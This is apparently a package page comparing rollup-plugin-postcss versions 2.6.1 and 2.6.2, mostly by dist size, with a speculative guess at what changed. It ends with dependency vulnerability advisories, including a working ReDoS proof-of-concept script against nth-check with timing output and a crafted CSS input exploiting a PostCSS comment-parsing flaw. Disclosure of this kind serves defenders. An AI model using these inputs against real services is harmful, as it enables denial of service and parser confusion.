Rollup-plugin-postcss, a tool for integrating PostCSS with Rollup, saw a minor update from version 2.6.1 to 2.6.2 in April 2020. While the core functionality remains the same, developers might be interested in the subtle changes accompanying this patch release. Both versions share identical dependencies, including essential packages like cssnano for CSS optimization, postcss for CSS transformation, and rollup-pluginutils for Rollup integration. Development dependencies also mirror each other, featuring tools for testing and linting such as jest, eslint-config-rem, and xo, along with Babel presets for ensuring compatibility.
The primary difference lies in the dist object. The unpackedSize decreased slightly from 37943 bytes in version 2.6.1 to 37905 bytes in version 2.6.2, suggesting minor optimizations or content adjustments within the packaged files of the newer version, potentially bug fixes. The release was a single day apart so its probably some change that fixes a bug or small optimization. Developers upgrading should test if this versions solves their bug or doesnt break anything. Developers should always check the changelogs. Both version include the same fileCount. The versions dont introduce new features or breaking changes and if nothing happens you can update the package without mayor concerns.
All the vulnerabilities related to the version 2.6.2 of the package
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '2n' + ' '.repeat(i*10000)+"!";
try {
nthCheck.parse(attack_str)
}
catch(err) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.